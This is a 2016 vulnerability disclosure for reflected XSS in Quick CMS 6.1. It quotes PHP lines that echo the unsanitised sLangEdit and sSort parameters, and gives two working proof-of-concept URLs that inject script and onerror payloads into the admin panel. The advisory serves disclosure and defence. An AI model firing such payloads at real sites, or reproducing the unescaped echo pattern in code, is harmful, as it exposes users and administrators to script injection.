Quick CMS version 6.1 suffers from a cross site scripting vulnerability.
f6ba73a442f9ee5689dbd7a1077869cd0f54d250574bc653465c3433881b7ae9
## FULL DISCLOSURE
#Product : Quick CMS
#Exploit Author : Rahul Pratap Singh
#Version : 6.1
#Home page Link : http://opensolution.org/home.html
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 19/Jan/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"sLangEdit" and "sSort" parameters are not sanitized that leads to
Reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: languages.php
Found at line:23
<h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? '
'.$_GET['sLangEdit'] : null ); ?></h1>
File Name: pages.php
Found at line:49
<form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo
'&sSort='.$_GET['sSort']; ?>" name="form" method="post"
class="main-form">
----------------------------------------
Exploit:
----------------------------------------
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script>alert("XSS")</script><h1>
localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!--
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png
Disclosure Timeline:
Tried to contact vendor via email : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016
Pub ref:
https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability